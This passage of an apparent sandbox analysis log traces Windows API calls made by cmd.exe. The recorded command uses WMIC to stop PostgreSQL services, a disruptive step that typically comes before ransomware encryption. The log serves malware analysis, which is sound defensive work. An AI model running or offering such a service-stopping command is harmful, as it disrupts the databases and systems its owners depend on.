2348 start_va = 0x7f1f9000 end_va = 0x7f1fbfff entry_point = 0x0 region_type = private name = "private_0x000000007f1f9000" filename = "" Region: id = 2349 start_va = 0x4f70000 end_va = 0x4f73fff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 2350 start_va = 0x4f80000 end_va = 0x4f83fff entry_point = 0x0 region_type = private name = "private_0x0000000004f80000" filename = "" Region: id = 2351 start_va = 0x5620000 end_va = 0x5956fff entry_point = 0x5620000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 181 os_tid = 0xd54 [0107.891] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0107.891] __set_app_type (_Type=0x1) [0107.891] __p__fmode () returned 0x77ac4d6c [0107.891] __p__commode () returned 0x77ac5b1c [0107.891] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0107.891] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0107.892] GetCurrentThreadId () returned 0xd54 [0107.892] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd54) returned 0x84 [0107.892] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0107.892] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0107.892] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.895] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.895] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x50efd94 | out: phkResult=0x50efd94*=0x0) returned 0x2 [0107.895] VirtualQuery (in: lpAddress=0x50efd9b, lpBuffer=0x50efd4c, dwLength=0x1c | out: lpBuffer=0x50efd4c*(BaseAddress=0x50ef000, AllocationBase=0x4ff0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0107.895] VirtualQuery (in: lpAddress=0x4ff0000, lpBuffer=0x50efd4c, dwLength=0x1c | out: lpBuffer=0x50efd4c*(BaseAddress=0x4ff0000, AllocationBase=0x4ff0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0107.895] VirtualQuery (in: lpAddress=0x4ff1000, lpBuffer=0x50efd4c, dwLength=0x1c | out: lpBuffer=0x50efd4c*(BaseAddress=0x4ff1000, AllocationBase=0x4ff0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0107.895] VirtualQuery (in: lpAddress=0x4ff3000, lpBuffer=0x50efd4c, dwLength=0x1c | out: lpBuffer=0x50efd4c*(BaseAddress=0x4ff3000, AllocationBase=0x4ff0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0107.895] VirtualQuery (in: lpAddress=0x50f0000, lpBuffer=0x50efd4c, dwLength=0x1c | out: lpBuffer=0x50efd4c*(BaseAddress=0x50f0000, AllocationBase=0x50f0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0107.895] GetConsoleOutputCP () returned 0x1b5 [0107.895] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0107.895] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0107.896] _get_osfhandle (_FileHandle=1) returned 0x3c [0107.896] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0107.896] _get_osfhandle (_FileHandle=1) returned 0x3c [0107.896] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0107.896] _get_osfhandle (_FileHandle=1) returned 0x3c [0107.896] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0107.896] _get_osfhandle (_FileHandle=0) returned 0x38 [0107.896] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0107.896] _get_osfhandle (_FileHandle=0) returned 0x38 [0107.896] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0107.896] GetEnvironmentStringsW () returned 0x52e7de0* [0107.897] FreeEnvironmentStringsA (penv="A") returned 1 [0107.897] GetEnvironmentStringsW () returned 0x52e7de0* [0107.897] FreeEnvironmentStringsA (penv="A") returned 1 [0107.897] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x50eecf8 | out: phkResult=0x50eecf8*=0x94) returned 0x0 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x0, lpData=0x50eed04*=0x65, lpcbData=0x50eed00*=0x1000) returned 0x2 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x4, lpData=0x50eed04*=0x1, lpcbData=0x50eed00*=0x4) returned 0x0 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x0, lpData=0x50eed04*=0x1, lpcbData=0x50eed00*=0x1000) returned 0x2 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x4, lpData=0x50eed04*=0x0, lpcbData=0x50eed00*=0x4) returned 0x0 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x4, lpData=0x50eed04*=0x40, lpcbData=0x50eed00*=0x4) returned 0x0 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x4, lpData=0x50eed04*=0x40, lpcbData=0x50eed00*=0x4) returned 0x0 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x0, lpData=0x50eed04*=0x40, lpcbData=0x50eed00*=0x1000) returned 0x2 [0107.897] RegCloseKey (hKey=0x94) returned 0x0 [0107.897] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x50eecf8 | out: phkResult=0x50eecf8*=0x94) returned 0x0 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x0, lpData=0x50eed04*=0x40, lpcbData=0x50eed00*=0x1000) returned 0x2 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x4, lpData=0x50eed04*=0x1, lpcbData=0x50eed00*=0x4) returned 0x0 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x0, lpData=0x50eed04*=0x1, lpcbData=0x50eed00*=0x1000) returned 0x2 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x4, lpData=0x50eed04*=0x0, lpcbData=0x50eed00*=0x4) returned 0x0 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x4, lpData=0x50eed04*=0x9, lpcbData=0x50eed00*=0x4) returned 0x0 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x4, lpData=0x50eed04*=0x9, lpcbData=0x50eed00*=0x4) returned 0x0 [0107.897] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x50eecfc, lpData=0x50eed04, lpcbData=0x50eed00*=0x1000 | out: lpType=0x50eecfc*=0x0, lpData=0x50eed04*=0x9, lpcbData=0x50eed00*=0x1000) returned 0x2 [0107.897] RegCloseKey (hKey=0x94) returned 0x0 [0107.897] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2981c [0107.897] srand (_Seed=0x5ad2981c) [0107.897] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE" [0107.897] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL STOPSERVICE" [0107.898] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0107.898] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x52e9d38, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0107.898] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0107.898] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0107.898] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0107.898] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0107.898] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0107.898] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0107.898] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0107.898] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0107.898] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0107.898] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0107.898] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0107.898] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0107.898] GetEnvironmentStringsW () returned 0x52e7de0* [0107.898] FreeEnvironmentStringsA (penv="A") returned 1 [0107.898] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.898] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0107.898] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0107.898] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0107.898] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0107.898] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0107.898] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0107.898] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0107.898] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0107.898] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0107.898] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x50efad0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0107.899] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x50efad0, lpFilePart=0x50efac8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x50efac8*="Desktop") returned 0x1d [0107.899] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0107.899] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x50ef850 | out: lpFindFileData=0x50ef850) returned 0x52e05c8 [0107.899] FindClose (in: hFindFile=0x52e05c8 | out: hFindFile=0x52e05c8) returned 1 [0107.899] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x50ef850 | out: lpFindFileData=0x50ef850) returned 0x52e05c8 [0107.899] FindClose (in: hFindFile=0x52e05c8 | out: hFindFile=0x52e05c8) returned 1 [0107.899] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0107.899] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x50ef850 | out: lpFindFileData=0x50ef850) returned 0x52e05c8 [0107.899] FindClose (in: hFindFile=0x52e05c8 | out: hFindFile=0x52e05c8) returned 1 [0107.899] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0107.899] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0107.899] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0107.899] GetEnvironmentStringsW () returned 0x52e7de0* [0107.899] FreeEnvironmentStringsA (penv="=") returned 1 [0107.899] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0107.900] GetConsoleOutputCP () returned 0x1b5 [0107.900] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0107.900] GetUserDefaultLCID () returned 0x409 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x50efc00, cchData=128 | out: lpLCData="0") returned 2 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x50efc00, cchData=128 | out: lpLCData="0") returned 2 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x50efc00, cchData=128 | out: lpLCData="1") returned 2 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0107.900] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0107.900] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0107.901] GetConsoleTitleW (in: lpConsoleTitle=0x52eaab0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.901] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0107.901] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0107.901] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0107.902] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0107.902] GetEnvironmentVariableW (in: lpName="postgresql", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0107.902] _wcsicmp (_String1="postgresql", _String2="CD") returned 13 [0107.902] _wcsicmp (_String1="postgresql", _String2="ERRORLEVEL") returned 11 [0107.902] _wcsicmp (_String1="postgresql", _String2="CMDEXTVERSION") returned 13 [0107.902] _wcsicmp (_String1="postgresql", _String2="CMDCMDLINE") returned 13 [0107.902] _wcsicmp (_String1="postgresql", _String2="DATE") returned 12 [0107.902] _wcsicmp (_String1="postgresql", _String2="TIME") returned -4 [0107.902] _wcsicmp (_String1="postgresql", _String2="RANDOM") returned -2 [0107.902] _wcsicmp (_String1="postgresql", _String2="HIGHESTNUMANODENUMBER") returned 8 [0107.902] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0107.902] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0107.902] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0107.902] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0107.902] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0107.902] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0107.902] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0107.904] GetConsoleTitleW (in: lpConsoleTitle=0x50ef8e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.904] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0107.904] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0107.904] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0107.904] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0107.904] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0107.904] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0107.904] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0107.904] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0107.904] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0107.904] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0107.904] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0107.904] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0107.904] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0107.904] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0107.904] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0107.904] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0107.904] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0107.904] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0107.904] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0107.904] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0107.904] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0107.904] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0107.904] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0107.904] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0107.904] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0107.904] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0107.904] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0107.904] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0107.904] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0107.904] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0107.904] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0107.904] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0107.904] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0107.904] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0107.904] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0107.905] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0107.905] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0107.905] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0107.905] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0107.905] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0107.905] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0107.905] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0107.905] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0107.905] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0107.905] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0107.905] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0107.905] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0107.905] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0107.905] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0107.905] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0107.905] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0107.905] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0107.905] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0107.905] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0107.905] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0107.905] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0107.905] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0107.905] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0107.905] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0107.905] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0107.905] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0107.905] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0107.905] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0107.905] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0107.905] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0107.905] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0107.905] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0107.905] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0107.905] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0107.905] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0107.905] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0107.905] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0107.905] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0107.905] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0107.905] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0107.905] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0107.905] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0107.905] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0107.905] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0107.905] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0107.905] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0107.905] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0107.905] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0107.905] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0107.905] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0107.905] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0107.905] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0107.906] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0107.906] SetErrorMode (uMode=0x0) returned 0x0 [0107.906] SetErrorMode (uMode=0x1) returned 0x0 [0107.906] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x52e05d0, lpFilePart=0x50ef3f4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x50ef3f4*="Desktop") returned 0x1d [0107.906] SetErrorMode (uMode=0x0) returned 0x1 [0107.906] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0107.906] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0107.911] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0107.912] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.912] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x50ef180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x50ef180) returned 0xffffffff [0107.912] GetLastError () returned 0x2 [0107.912] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.912] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x50ef180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x50ef180) returned 0xffffffff [0107.913] GetLastError () returned 0x2 [0107.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.913] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x50ef180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x50ef180) returned 0xffffffff [0107.913] GetLastError () returned 0x2 [0107.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.913] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x50ef180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x50ef180) returned 0xffffffff [0107.913] GetLastError () returned 0x2 [0107.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.913] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x50ef180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x50ef180) returned 0x52eb248 [0107.913] FindClose (in: hFindFile=0x52eb248 | out: hFindFile=0x52eb248) returned 1 [0107.913] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x50ef180, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x50ef180) returned 0xffffffff [0107.913] GetLastError () returned 0x2 [0107.913] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", 